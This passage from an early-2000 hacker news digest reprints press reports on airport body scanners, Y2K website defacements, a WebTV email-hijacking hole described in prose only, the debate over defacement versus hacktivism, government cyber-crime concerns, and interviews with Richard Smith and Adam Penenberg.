The manufacturer of the BodySearch device said that the concerns are excessive.

Robert Peters, vice president of American Science and Engineering of Billerica, said ''You don't get a sharp line image.'' Scanning private areas is necessary because ''that's one of the places where people hide stuff.''

The Customs Service began installing bodyscanners over the last several months as part of Kelly's overhaul of inspectional procedures in response to charges of racial profiling and a congressional hearing that followed. Black women in particular have complained that they were singled out for pat-downs, and a group in Chicago has filed a class-action lawsuit against the agency.

The Customs Service was unable to provide numbers for those who have opted for scanning over frisks, and how many of these scans turned up contraband.

Scanners were recently installed at terminals in New York, Miami, Atlanta, Los Angeles and Chicago at a cost of about $125,000 each.

Nojeim said the body scanners are eroding constitutional rights.

He cited other dangers. ''It gives passengers a false choice designed to make them feel better about being subjected to an intrusive search conducted without probable cause of a crime. And it runs the risk of making airport search much more common.''

But Peters responded that the scanner is an improvement over the frisk. ''A patdown requires a touching of the private area. A scanner never touches anyone. You are never invading a person's private space,'' he said.
This story ran on page A12 of the Boston Globe on 12/31/1999.
© Copyright 1999 Globe Newspaper Company.

@HWA

42.0 Defacements Continue Unabated in the New Year 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

For some reason web site defacements continue to make news. While there were dozens of defacements over the last few days those of Lloyd's of London, The UK railways services company Railtrack, and the German Police actually caused a big enough stir to grant some news coverage. None of the defacements caused any permanent damage and all were fixed very quickly.

BBC - Railtrack defacement
http://news.bbc.co.uk/hi/english/sci/tech/newsid_585000/585227.stm

Associated Press - via San Jose Mercury News - Railtrack defacement
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/068585.htm

Reuters - via Wired - Lloyd's of London defacement
http://www.wired.com/news/business/0,1367,33390,00.html

Reuters - via Excite - German Police Union defacement
http://news.excite.com/news/r/991230/08/odd-hack

Attrition.org Defacement Mirror
http://www.attrition.org/mirror/attrition/2000-01.html

As of this writing Attrition has been down due to hardware problems; they lost the main hard disk on their machine. Radius.net is taking over mirroring of defacements while they are down. http://www.radiusnet.net/mirror. Notification of defacements can be sent to hacked@radiusnet.net.

BBC:

Hackers target UK rail information

[Image caption: How the site should appear]

Hackers broke into and distorted Railtrack's internet home page on Friday as a Y2K prank.

The website provides online timetable information for travellers using the UK's railway services.

The message from the hackers read: "Sorry, but due to the Y2K compatibility problems there will be no trains operating between 31-12-99 and 02-01-00."
The hackers then sent their greetings to "all the Railtrack directors, all the sheep in Wales" and acquaintances with names like HackUK, Rootworm and Slacker.

Railtrack quickly corrected the site.

A Railtrack spokeswoman said: "This is a prank that is supposed to be amusing.

"Unfortunately it will affect hundreds and thousands of people who are trying to get into London for the millennium eve celebrations.

"We would like to reassure all our customers that trains are running as published."

Railtrack has spent four years checking and correcting its computers.

The company, which is responsible for all the track, signals and some stations in the UK's privatised rail network, was deemed to be 100% compliant under the government's Action 2000 millennium readiness "traffic light" assessment process.

It is also operating a command centre through to the end of March to co-ordinate Year 2000-related problems that crop up.

-=-

Reuters:

Posted at 8:14 a.m. PST Friday, December 31, 1999

Hackers break into rail network's Web page

LONDON (AP) -- Hackers broke into an official Web site and issued a false warning that train service in Britain had been canceled Friday due to millennium bug problems.

The warning, which read ``No trains today,'' was discovered on Railtrack's Internet site at about 9 a.m., officials said. The hoax message also sent greetings to all Railtrack directors and ``all the sheep in Wales.''

Instead of the usual menu, which lets people check train timetables around Britain, the hoax message said no trains would run from New Year's Eve until Jan. 3 because of Y2K computer problems.

The rest of the site was still operating, but more difficult to access, officials said.

After discovering the hoax, computer experts had it fixed by 11:30 a.m., said Railtrack spokeswoman Lynn Harvey.

``It was annoying rather than a problem,'' Harvey said. ``People were inconvenienced.''

Many Britons rely on the Web site to check timetables to plan their travel arrangements.
Particularly with the long holiday weekend, the number of people relying on train service was expected to be high.

``This is a prank which is supposed to be amusing,'' Railtrack, the company that runs Britain's rail lines, said in a statement. ``Unfortunately it will affect hundreds and thousands of people who are trying to get into London for the Millennium Eve celebrations.''

-=-

@HWA

43.0 WebTV Hole Causes Spam 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"I want, I want, I want my WebTV"

From HNN http://www.hackernews.com/

contributed by Evil Wench

Exploit code currently circulating on the internet allows someone to send email from a WebTV user's box without the user's knowledge and can also be used to compromise the security of users' stored mail. The exploit is being embedded in posts in WebTV's alt.discuss newsgroups, emails, and web pages. It then directs any WebTV box that loads the page to send an email message to an address set in the code.

Net4TV
http://net4tv.com/voice/story.cfm?StoryID=1823

Wired
http://www.wired.com/news/technology/0,1282,33420,00.html

WebTV Security Breach: Hijack Code Can Forward Stored Mail

Laura Buddine (January 2, 2000)

Net4TV Voice has learned that the "hack" code that is being used to send email from a WebTV user's box without the user's knowledge also is being used to compromise the security of users' stored mail.

The code, which is being embedded in posts in WebTV's alt.discuss newsgroups, emails and web pages, directs any WebTV box that loads the page to send an email message to an address set in the code. The code executes "in the background;" users who have sent the mail do not see any indication of mail being sent, and only find out about it if they receive a reply or look in their Sent Mail folders.

Now, Net4TV Voice has learned that the code has even more serious security implications. It also has been used to forward email from users' own Sent Mail and Saved Mail folders to an address set in the code.
Although hackers cannot directly see the email that a WebTV user has within his/her own account, they can forward it out into their own email account on another service, helping themselves to a user's private correspondence and information. Net4TV Voice has been shown how this can be done, and also has heard from one user whose email account has apparently been violated.

Code Known At Least Since September

The basic email code that is the key to controlling a WebTV user's mailbox has been known by some users since at least September, when it was discussed in one of the WebTV hacking newsgroups. A number of the frequenters of the group used the code to create "receipts" in their mail so that they would receive a mailback when the email was opened and read, or as a watch of their web pages so that they could see who was surfing it.

"It was not intended to be used for malicious purposes," wrote one of the WebTV users who made use of the code. "Of course, some with questionable intent got a hold of the code and used it for other than the original purpose."

Mods Know About Code, But Customer Service, Abuse Don't Get It

Among other things, the code has been used to bombard WebTV's Abuse Department with profane complaints, and to cause users to unknowingly send nasty messages to others. One of the problems is that there is no way within the email itself to prove that the box it came from did not originate the email; one WebTV user has written to Net4TV Voice that WebTV's Compliance Department is threatening her with termination for "spamming," even though the email is being triggered by an email containing the code that is in her box.

On December 21, a moderator in the official webtv.users newsgroup posted a warning that users should not go into a hacking newsgroup because of the code. The warning, which was published in Net4TV Voice's mid-issue story, User Alert: WebTV Email 'Hack' Can Send Mail From Your Box, claimed that the code itself was created by "some users."
In fact, the code was created by WebTV itself (as were all elements and codes in the WebTV software). Net4TV Voice has since been advised that the code itself was previously posted in webtv.users and was "slipped past the mods."

Often, the emails containing the code also contain another "no send" code that prevents them from being forwarded or "bounced." This prevents the trouble-making mail, post, or page from being forwarded to WebTV Abuse as evidence. This has led to some ludicrously frustrating exchanges with WebTV Customer Service in the WebTV Help Center, which insists that they cannot do anything and that posts must be forwarded to Abuse before action can be taken. WebTV user JaxRed offered this example that he had received after he wrote to them explaining the problem and that the posts had "no send" codes preventing them from being forwarded:

Dear Customer,

Thank you for writing WebTV.

We understand your concern regarding this matter. However, this is not an issue that the Customer Service Center, can help you with. We apologize for the misunderstanding on our part regarding this matter. However, this is a matter that you will to forward (sic) on to Abuse@webtv.net. Abuse will look into this matter further for you. Please forward any and all the information that you have regarding this matter to Abuse@webtv.net. Please only forward this matter once, as if this issue is forwarded more than once there is a chance that this issue will be rejecked.(sic)

Another user, however, received a different response from the Customer Service Center when she complained about a post made by a self-proclaimed hacker:

Dear Customer,

Thank you for writing WebTV.

We are aware of this issue and are working on removing this person. We do appreciate your feedback. I will pass this information along for you.
Waiting for WebTV's Response

Net4TV Voice contacted WebTV Networks on Thursday in preparation for this story, but were advised that because of the New Year's holiday, they would be unable to respond until January 3. Although we declined to hold the story to wait for their response, we will post an update to the story when we receive it.

However, Net4TV discussed the issue with a former WebTV employee who was involved in the operation of the WebTV servers. These were his comments:

WebTV's machines already filter certain content before sending it along to our boxes. They call it transcoding. Essentially what happens is they replace certain HTML with their own, mainly for their own security but also for functionality in some cases.

What this means is that WebTV's machines already go through every line of code, whether on a web page or in an e-mail or newsgroup post, looking for the offending HTML and transcoding as necessary before our boxes receive it. That's why I can't understand what's taking them so long to fix this thing.

It's probably easier said than done but a quick solution would be to add this mail exploit code to the list of code they're already filtering and be done with it, at least until they can address the problem more thoroughly in a future client build. That'd have to be done eventually because there are certain situations where our boxes by-pass WebTV's machines (and thus the transcoding) but in the meantime the overwhelming majority of the problem would be solved.

WebTV's Security History

This is not the first time that codes that WebTV created for their own purposes have either been leaked or discovered by users and used to create security holes and "bombs." About eighteen months ago, WebTV's email was actually hacked by a WebTV user, who was then trapped by a "hacking contest" that got him to reveal how he had done it. The hack was reported by the "trapper" to WebTV and that hole was closed.
But more holes remained, including some that had many WebTV users playing "Doom" long before it was released (and only to DishPlayer users). Last spring, some WebTV users found another code that could be used to insert and rearrange Favorites folders in other users' boxes, while the use of a WebTV code that could wipe out users' accounts (the Amnesia Bomb) caused such problems that WebTV was forced to rush out a browser update to stop it (Amnesia Bomb Halts Plus Update).

The most serious security breach was revealed in September, when Net4TV Voice broke the story WebTV Spam Block Revealing User, Subscriber IDs. WebTV tried to downplay the seriousness of the breach, claiming that nothing could be done with the IDs even if they were revealed (not true -- with a user ID known, it was possible to terminate a user's account remotely); WebTV's Customer Service department even sent email to users in which they claimed that the Net4TV Voice story was "bogus" and that Net4TV was working with spammers to get the maximum amount of spam delivered to WebTV users. When confronted by CNet and ZDNet, however, WebTV admitted the security breach was true but stated that it had been fixed.

Microsoft itself has also had its security problems, with breach after breach in HotMail security finally causing the company to announce that it was calling in an independent outside auditor to review its security. Microsoft would not release the name of the auditing company, stating only that it was one of the "big five," but did admit that its biggest breach had been caused by a string of code that hadn't been tested for security. When the flaw was first revealed, Microsoft claimed that its security had been broken by sophisticated hackers, armed with powerful software tools. In October, Microsoft announced that Truste had OK'ed the security fix at HotMail.

Security and privacy are two areas of growing concern, as the U.S.
continues to use a "voluntary action" and "self-enforcement" approach rather than the stringent protection of the individual's personal data that the European (EC) countries require. The U.S. privacy laws are a patchwork of state and federal laws, rules, and regulations that have numerous loopholes, and as databases link up and make it easier to create detailed profiles on any citizen, there is increasing call for a general privacy policy to replace today's patchwork.

WebTV itself has also drawn fire because of its collection of user data; although then-CEO Steve Perlman revealed in October 1998 that WebTV was recording its users' activity on the Net and on TV (see WebTV Is Watching You), it did not offer its users the ability to "opt out" of being recorded until the HipHop upgrade in November, 1999, over one year later.

"It's not that I only don't trust WebTV not to sell information they have on me," wrote one user to Net4TV Voice, "I don't trust them not to just let it out accidentally because they didn't lock the door. I'm beginning to wonder if they even care about anyone's secrets except their own. I just traded up to a new WebTV Plus and I used my son's credit card. He's got a different name and a different billing address -- but they never even asked for anything except a card number and an expiration date... it could have been anyone's."

-=-

Wired;

WebTV To Patch Email Hole
by John Gartner

3:00 a.m. 4.Jan.2000 PST

WebTV is working on a fix for a security hole that enables third parties to send email from WebTV accounts.

Malicious programmers have been embedding the HTML of Web pages and newsgroups with stealthy code that can force email accounts into sending messages without the user's knowledge.

The security hole was first reported on Net4TV. The code is being used to spam WebTV's abuse mailbox and could be used to send emails to unsuspecting third parties.
On Tuesday, a WebTV spokeswoman acknowledged the security problem, and said that the company was working on a software patch that would be posted today.

WebTV users can determine if their email account has been compromised by checking their "sent" folder for email and identifying anything that does not look familiar, the WebTV spokeswoman said.

WebTV will update their server software to remove the vulnerability; users will not have to download any additional software, according to the company.

According to Laura Buddine of Iacta.com, the parent company of Net4TV, the code was first made known to hackers in September, but has become widespread during the last week. "At this point, this code is all over the place," said Buddine.

The offending code has been placed on newsgroups that are accessible only to WebTV users, as well as on hacker newsgroups such as alt.discuss.webtv.hacking, according to Buddine. She said the code was originally written by a WebTV employee but has since turned into a tool for ne'er-do-wells.

"I could envision someone using it to get others in trouble by sending death threats from other people's accounts," Buddine said.

Buddine said that she has received more than 10 emails from WebTV users who claim to have been affected. WebTV said that the user impact has been minimal with only one user reporting malicious mail being sent.

In addition to being able to generate email without the user's knowledge, the code can be engineered to forward email from sent mail or saved mail folders.

According to Buddine, a WebTV employee acknowledged the existence of the security hole on 21 December, and posted a warning to WebTV users not to visit the alt.discuss.webtv.hacking newsgroup because it would cause erroneous messages to be sent to the WebTV abuse mailbox.

Buddine said that hours after Net4TV posted the story on Monday detailing the hole, WebTV blocked the Net4TV mail servers from sending email to WebTV users.
WebTV posted the Net4TV IP address on the list of spammers. Buddine said email emanating from the Net4TV IP address was denied as of 4 p.m. PST Monday. She said Net4TV's attorney sent an email to WebTV early Tuesday, and their IP address was removed from the list approximately 20 minutes later.

In September, Net4TV reported that WebTV email accounts that were full would disclose subscriber and user ID information as part of an automatic reply. WebTV subsequently fixed the problem.

@HWA

44.0 Vandalism or Hactivism? 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

For the most part web defacements over the last year have been nothing but vandalism executed by kids looking for bragging rights amongst their peer group. Hactivists struggled throughout 1999 to find an identity and separate themselves from this activity. MSNBC takes a look at these two issues and more in their report.

MSNBC
http://www.msnbc.com/news/351434.asp?cp1=1

Electronic vandalism runs amok

1999: A year in which the electronic underground came of age

The FBI's Web site was among those victimized by (PIC) hackers who defaced government sites this year.

By Brock N. Meeks
MSNBC

WASHINGTON, Dec. 29 — Digital vandalism jumped on and off the national stage this year fueled by hyperbole, spawned largely by fear, uncertainty and doubt. Few of these exploits were of any real note and served largely as an embarrassment to apathetic systems administrators whose computers were easy targets for kids with too much time on their hands and the patience to download any of the numerous “do-it-yourself” break-in tools lingering in murky digital corridors of the Internet.

‘To date, the vast majority of Web site defacements have been a mere collection of invectives, profanities and little else.
No real statements of or for any political cause have ever been made, even when the domain that was hit presented an optimal forum for such statements.’
— JAY DYSON
systems administrator for NASA's Jet Propulsion Labs

THE FEDERAL BUREAU OF INVESTIGATION kept chasing these computer vandals, scaring many, arresting some and prosecuting even fewer. In one of the most infamous moves this year, the FBI executed a multi-state raid on a dozen or more people in the aftermath of several high-visibility government Web site defacements, most notably the official White House Web site, the show pony of the federal government.

The FBI eventually tracked down and prosecuted the perpetrator of the White House Web site break-in and in return bought itself a kind of digital holy war. Every kid that fashioned him or herself a “hacker” began defacing Web pages, seemingly at will, leaving enough mangled prose and pretzel logic screeds to drive a high-school English teacher into early retirement.

The self-fueling “war” against the FBI eventually led to the Bureau’s own electronic back yard when its official Web site was attacked and was out of commission for a week.

Has the FBI beefed up its ability and effectiveness in corralling these electronic joy riders? No, says Brian Martin, a computer security consultant and staff member of Attrition.org, a Web site that acts as an archive for hacked Web sites. The FBI “has just been lucky that some of these defacers are piss-poor hackers,” Martin says. The defacers “leave obvious trails… and brag about their exploits on IRC from their home accounts, basically giving themselves up,” Martin says.

HACKER, HEAL THYSELF

Those who traffic in the electronic underground often form “organizations” that are loose coalitions of allegiances. Some last for months, some a few days; often, one is a member of several different groups at the same time.
These digital tribes brand themselves and their exploits so that bragging rights can be more easily tossed around, not unlike the way graffiti artists “tag” their works with a spray-paint can.

Stupid and careless acts have usually been addressed between members of the same or competing groups, off the radar screen of the press and public in what amounted to little more than locker room pejoratives being electronically hurled at one another as fast as one could misspell any word with more than two syllables.

But this year saw the emergence of public upbraiding for inane acts in what the Hacker News Network called “a turning point in the underground hacking community.” An underground group called the “Legions of the Underground” unilaterally declared a full-scale “cyberwar” on the computing infrastructures of China and Iraq, citing human-rights abuses and the production of weapons of mass destruction as justification.

‘Unless the domain is specifically targeted, defaced with a specific message that is relevant to the domain and current events, it is weak justification at best. Hacking www.mom-and-pops-store.com with a “free Switzerland” message just isn’t logical.’
— BRIAN MARTIN
Attrition.org staffer

The reaction from within the underground community was a swift and unrelenting condemnation of LoU’s intent. LoU quickly recanted, claiming it never really had destructive intentions and laying the confusion at the feet of the clueless media.

But in a joint statement released by several long-standing and well-known hacking groups — including 2600, Chaos Computer Club, Cult of the Dead Cow, L0pht Heavy Industries and others — the LoU action was publicly condemned.
In the joint communiqué, groups said they “strongly opposed any attempt to use the power of hacking to threaten or destroy the information infrastructure of any country, for any reason.”

FALL OF THE RISE OF HACKTIVISM

This year also saw the de-evolution of so-called “hacktivism,” which is political speech wrapped around the act of defacing Web sites. In the beginning, such defacements carried valid political messages placed on cracked Web sites as a valid means of protest.

Such political acts were quickly “adopted” by garden-variety computer vandals — “script kiddies,” as they are derisively known in the underground — as a means of trying to validate routine and mindless computer break-ins.

In the joint statement condemning the LoU plans, the coalition of hacker groups noted that hacktivism “may be a legitimate use of hacking knowledge,” but that there was a thin line between political activism and “wanton destruction” of computer property.

“To date, the vast majority of Web site defacements have been a mere collection of invectives, profanities and little else,” said Jay Dyson, a systems administrator for NASA’s Jet Propulsion Labs who battles daily with computer break-in attempts.

“No real statements of or for any political cause have ever been made, even when the domain that was hit presented an optimal forum for such statements,” Dyson said. Most hacktivism, Dyson said, “strikes me as an afterthought, something the intruder does to legitimize the system breach to themselves or their peers.”

Ninety-nine percent of alleged acts of hacktivism are “a thinly veiled charade to mask electronic joyriding,” said Attrition.org’s Martin. “Unless the domain is specifically targeted, defaced with a specific message that is relevant to the domain and current events, it is weak justification at best. Hacking www.mom-and-pops-store.com with a ‘free Switzerland’ message just isn’t logical,” Martin said.
“Hacking www.oppress-switzerland.org with a valid rant about why it is ethically or morally wrong to do so then falls under ‘hacktivism.’ Everything else is script-kiddy delusion of moral justification.”

THE REAL DARK SIDE

Finally, this year saw persistent rumors crop up of a mysterious international figure known in the electronic underground as “Virus.” This person reportedly trolls the Net, soliciting hackers to break into government computers looking for intelligence of all types and offering them money if they are successful.

Those contacted by Virus say he claims his name is “Khalid Ibrahim.” MSNBC has contacted at least four individuals who say they’ve been contacted by “Virus.” One hacker was asked to break into government sites in India and Pakistan looking for information on missiles capable of carrying nuclear warheads.

Hacker News Network: Highlights of 1999

According to sources interviewed by MSNBC, Virus claims to be based in India, and evidence given to MSNBC apparently confirms that he is logging in from an ISP based in that country.

Those contacted by Virus and interviewed by MSNBC say he claims not to be a terrorist; his real motivation for collecting the data remains unknown.

Messages sent by MSNBC to alleged e-mail accounts owned by Virus and attempts to contact him via Internet chat services, such as ICQ, have not been answered.

One hacker contacted by Virus claims to have received $1,200 from him, though MSNBC was not able to confirm the payment.

MSNBC has confirmed that the FBI has questioned several hackers the Bureau’s agents have raided about the existence of Virus and whether or not they have done any work for him.

To date, the real identity, location and motivation of Virus remains unknown and he is still trolling the Net.
@HWA

45.0 No Longer Worried About Y2K Feds Look to Security 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mphantasm

Since Y2K is over the FBI and other agencies have set their sights on terrorists, hostile nations, criminals, and other cyber evil-doers as they prepare to protect our nation's infrastructure.

CNN
http://www.cnn.com/2000/TECH/computing/01/02/cyberterrorism/

Governments ready to fight cyber-crime in new millennium

January 2, 2000
Web posted at: 4:29 a.m. EST (0929 GMT)

From Justice Correspondent Pierre Thomas

WASHINGTON (CNN) -- In 1997, a Worcester, Massachusetts, teenager used his computer to knock out communications at an air traffic control tower -- for six hours.

In March of 1999, a programmer unleashed the Melissa virus, disabling thousands of computers around the United States.

And every day, the Pentagon is the target of as many as 100 hacking attempts.

As a new century begins, cyber-crime, including electronic terrorism, looms as a new way for criminals to threaten global security.

According to Richard Clark, the coordinator for security, infrastructure, protection and counter-terrorism at the National Security Council, our dependency on computers will make us increasingly vulnerable.

"They (computers) run our electric power grid, our telecommunications network, they run our railroads, our banking system, and all of them are vulnerable, at some level, to some degree to information warfare, or cyber-terrorism," Clark said.

"There really is a broad spectrum of people, groups and countries that engage in cyber-attacks as a general matter for different purposes," said Michael Vatis, director of the National Infrastructure Protection Center at the FBI.
'It's a very serious threat' Terrorists, hostile nations, criminals, hackers -- they all present a wide variety of threats and create new pressure for intelligence, defense and law enforcement around the world. The FBI computer crime case load has doubled each of the last two years. In October, the FBI reported 800 pending cases. "According to the National Security Administration, there are over a hundred countries that are working on techniques to penetrate our information infrastructure," said Sen. Jon Kyl, R-Arizona. "Many of them are aimed at the Defense Department and high security areas in both the private sector and the government, so it's a very serious threat." The government is working to prepare for electronic assaults, much the way it prepares for other forms of terrorism. "Our mission is to try to help protect the nation's critical infrastructures," said Vatis. "Somebody sitting with a laptop computer and a modem connection on the other side of the world can attack those things if they don't have good security," said Vatis. Added Clark, "There are governments that are building units, military units and intelligence units, to engage in information warfare. They are developing capabilities, they are building the units, and in some cases they seem to be doing reconnaissance on our computer networks." Countries develop anti-hacker squads Cyber-criminals have a major advantage: They can use computer technology to inflict damage, while simultaneously reducing their risk of getting caught. "Terrorists still prefer car bombs, you know. A car bomb still has a lot impact than a cyber-attack," said Richard Power with the Computer Security Institute. "But there is always the possibility that somebody could make some kind of dramatic statement by bringing down some aspect of the infrastructure." Some nations have developed computer anti-hacking teams to block and investigate crimes in cyberspace. 
But officials say as technology rapidly advances, preventing cyber-crime and catching cyber-criminals will only become tougher.

@HWA

46.0 Interview With Richard Smith 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Privacy advocate and cyber whistle-blower Richard Smith has given a rather extensive interview to the Boston Globe. Now retired from Cambridge based Phar-Lap Software, a company he headed for 13 years, Smith looks for privacy loopholes online.

Boston Globe
http://www.globe.com/dailyglobe2/002/city/A_whistle_blower_out_to_save_cyber_privacy+.shtml

A whistle-blower out to save cyber privacy

By Andreae Downs, Globe Correspondent, 1/2/2000

BROOKLINE - The man who helped bust the writer of the Melissa computer virus, the man who has been behind several cyber headlines about on-line privacy or the lack thereof, lives, actually, a rather private life on a hill in Brookline.

Richard Smith, 46, enjoys stripping the glitz off Web pages and finding out what's underneath. What he's found, after about a year of digging, is that more information is being gathered about Web surfers than most people suspect. ''I look at it from a technical standpoint, how it all works,'' Smith said in a recent interview. ''And then I compare it to what the companies say they do.''

Smith has been called a ''living treasure of the Internet'' by those interested in on-line privacy issues. ''Before him, nobody seemed to be watching the e-store,'' said Jason Catlett, president of Junkbusters Corp., an on-line company based in New Jersey that also investigates computer privacy matters. ''Even the knowledge that there's a whistle blower in cyberspace is surely keeping some of the worst schemes of marketers from reaching implementation.''

Smith retired in September from Phar Lap Software, a firm he founded and led for almost 13 years.
Phar Lap, in Cambridge, specializes in software tools for the remote control of embedded computer systems in things like weather stations and automatic teller machines. Smith and his family moved from Needham to Brookline about a decade ago so that his step-daughter, Anna Shusterman, now a science teacher, could attend Brookline High School. He was also interested in reducing his commute to Cambridge. The nice thing about Brookline, Smith said, is that it feels like a college town without having a college in it. ''I grew up in the South in a college town,'' he said. ''So I felt comfortable about that.'' His privacy passion stemmed from a furor last year about a ''leaky window'' in the Pentium III chip. Critics claimed the chip could have made all Internet transactions traceable, by leaving a discernible code number. Smith found many older computers and browsers were already potentially traceable in the same way. So what's the big deal? ''These numbers are sort of like a Social Security number,'' he said. ''If you keep using the same identification number, different databases can be correlated. So you're not anonymous; they can uncover your name, address, and phone.'' Smith believes user traceability could lead to an increased amount of junk mail and calls; for instance, if you check up on mortgage rates in the morning on the Web, you could get an evening call from a mortgage banking firm. ''Marketing firms claim that they are only planning to use this information to target their audiences better,'' he said. ''I don't buy that. Smith has found that agencies that put those flashing banner ads on Web sites also collect data on what people at a site are typing or clicking on, one reason the ads become increasingly relevant to your Lycos or AltaVista search, for instance. ''But nobody tells you this is happening,'' Smith said. ''And we don't know how they are using the information, there's no disclosure. 
Is it more than market research?'' Certain software that one can download from the Internet, such as the comic cursors from Comet Cursor, will tell a central server where someone is surfing; and Real Jukebox, once downloaded, can tell a central server what music CDs a user subsequently listens to on their computer. Also, some spam (unsolicited direct marketing e-mail) contains code to let a central computer know if the recipient opened the mail. ''The problem is it doesn't let you choose whether to let them know, but they now know if you are interested in this product,'' he said. ''It is potentially crossing the line of overriding user desires.'' Smith is particularly incensed about Comet Cursor, which is aimed at children. A visit to a children's Web site will trigger an option to download the software to change your cursor to a particular comic book character. If you decline, the question pops up again every time you visit the site. ''The nag factor alone is annoying,'' he said, but that the cursor software once downloaded then reports your presence on future Web sites that have the customized cursor option to an unknown central computer is ''kind of creepy.'' ''The question is what is this company is going to do with this information?'' Smith thinks some company snooping will eventually have to be regulated for it to stop. ''It's a matter of awareness first,'' he said. ''But inevitably, there will be regulating so that profiling'' the collection of data about you and your consumer preferences ''is an explicit option you consent to.'' To get rid of some tracking, users can install software that disables so-called ''third-party cookies.'' Cookies, in Internet parlance, are small programs in your personal computer that allow a Web site you've visited before to recognize you. That's why a particular airline site knows to open at reservations to your favorite city first, or why a book site might give you increasingly relevant book suggestions.
Cookies are not all bad, Smith argues, but you should be told they are there. Another option is so-called anonymizer software, which covers your Web tracks by using a central server or by stripping out cookies. Smith looked into three of these, however, and found it is possible to break them, although it's not necessarily being done. Smith's passion now is strictly volunteer. He estimates he spends about 30 hours researching a topic before dropping a carefully crafted media bomb. He could, he said, eventually do it for pay. He helped track down the New Jersey-based creator of the Melissa virus that attacked thousands of computers last March, and it was his research that led Real Networks Inc. to agree to publish a software ''patch'' to prevent its product, Real Jukebox, from collecting information on users. Some companies with snooper functions on their Web sites have approached him to help prevent future embarrassments. For the moment, Smith says, he prefers his volunteer detective work, which he does on two computers in the third-floor office of his cavernous home with a view of the Boston skyline. He is kept company by wife Faina, daughter Polina, and a new puppy, a failed attempt by Faina to force him to walk outside more and meet the neighbors. ''I expect at some time I'll go stir crazy,'' he said of his current home-office isolation. ''But so far, I've been pretty busy talking on the phone; I haven't needed to get out.'' This story ran on page 01 of the Boston Globe's City Weekly on 1/2/2000. © Copyright 1999 Globe Newspaper Company. @HWA 47.0 Interview with Adam Penenberg 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dave920 Black Market Enterprises conducted an interview with Adam Penenberg of Forbes Magazine as part of the new section of BME Online: HYPE. Penenberg is the author of numerous technical articles including ones about AntiOnline, Se7en and other underground events. 
The article includes personal impressions of Penenberg as well as the interview itself. The article can be found at: Black Market Enterprises http://www.b-m-e.com/features/hype-penenberg.html HYPE Interview with: Adam Penenberg, 37, of New York City, New York dave920: What is your greatest fascination with computers? Adam Penenberg: I'm not so much interested in computers as I am with the broader issue of technology, primarily the way it changes us, our culture and our way of thinking. Ever go to a rock concert only to be disappointed the band doesn't sound as good live as it did in the studio? The drums are too loud, the bass fuzzy, the acoustics suck, the vocals don't sound as sweet? But that's real music; it's recorded music that's not real. Yet we have been influenced by the unattainable "perfection" of recorded music. It's more real to us than real music. This is just one way we have been influenced by technology. Another is online chat. In some instances someone's online moniker becomes more important, more real to him, than his real world name. And the experiences he has in cyberspace--the online conversations, flirtations and dalliances, his triumphs and tribulations--become more important to him than his real-world experiences. This is certainly true for some software pirates and hackers who hang out on IRC all night. Technology is changing who we are and how we think. As a journalist I believe there's nothing more worthy of coverage. Who or what introduced you into journalism, and what made you decide to focus on the computer industry? I got into journalism by accident. In 1991, after living and traveling abroad for 4 years (and utterly clueless as to what I would do with my life) I was walking by Katz's Deli on the Lower East side of New York. Katz's has this ancient sign: "Send a salami to your boy in the army." ("Salami" and "Army" rhyme when you say them New Yawk style.)
It was the time of Desert Storm and I noticed Katz's was shipping salamis to soldiers in the Middle East. I pitched it to The New York Times Living section and long story short they published it, even though I had no prior experience. I thought, This freelance writing is easy, then practically starved for years. When I started writing for The Sunday New York Times Long Island section in the mid 1990s, "the guyland" was transitioning into a tech economy. Until then I was writing environmental stories for the Times, since there was always some environmental disaster happening. But then I got a taste of tech and have focused on it ever since. My favorite Times lead for a tech story I wrote: "Flying through a virtual colon, according to Dr. Ari Kaufman, is a lot like playing a Star Wars video game." Have you previously been recognized for your contributions to the computer industry? If so, what were they? Nope, not by the computer industry. How often do you use your computer(s), and what do you mainly use them for? Every day. I use a Mac G3 laptop at home and a G3 desktop at work. Basic stuff, mostly net surfing and email. I learned on a Mac in college and like the interface. I like the fact that you plug something in, it works immediately. I like that Mac has always been Y2K compliant. I detest the Windows OS--there's something creepy about it if you ask me--and dislike the feel and touch of most PCs. If you don't understand just ask a Mac user for a demonstration. Are you afraid of Y2K? What do you think will happen? I'm not afraid of Y2K. I'm afraid of people's reaction to unknown fears. I figure we would have experienced Y2K-related glitches by now, since many payroll databases look ahead months. Or how about the Sept. 9th trigger date (9999 is an error code, so they say), which didn't trigger anything? Ho hum. There may be minor glitches but I can't imagine anything that bad happening here. Like on the scale of that awful NBC Movie "Y2K".
But that's not to say nothing will happen. You have to assume phone circuits will be overloaded right after midnight, as people call to wish each other Happy New Year. And I'm thinking that we as humans will burn record amounts of energy, as the lights stay on in 18 time zones. All night. Everywhere. Lights could flicker on and off, though I doubt there will be Y2K-related brownouts. Phones could go out at the same time. And people could mistake this for Y2K Armageddon. Pull up a chair and pass the chips and salsa. The Revolution will not be televised. If you could use a computer to significantly change the world in one way, what would it be? Why? If I could use a computer to change anything, it would be the educational system in this country. Get kids excited about learning. Make it challenging and fun and interesting and relevant. For too long children have been let down by irresponsible politicians willing to spend billions on pork barrel projects but little on text books and teachers. It's shameful and it's not getting better. Another thing: I'd make the Ray Charles version of "America the Beautiful" our National Anthem. What do you enjoy about working for Forbes.com? What other organizations have your written for or worked at? Actually I'm a columnist for Forbes.com and a senior editor at the magazine. As a columnist for the Web site I get to stretch out and explore topics that interest me, from cyberterrorism to politics and activism to hackers and e-commerce. A column is an opinion piece, and I have a lot of opinions. And I like being on the Net. At the magazine I write investigative pieces, usually with a technology focus. For instance, my last article for the magazine was a cover story called "The End of Privacy". 
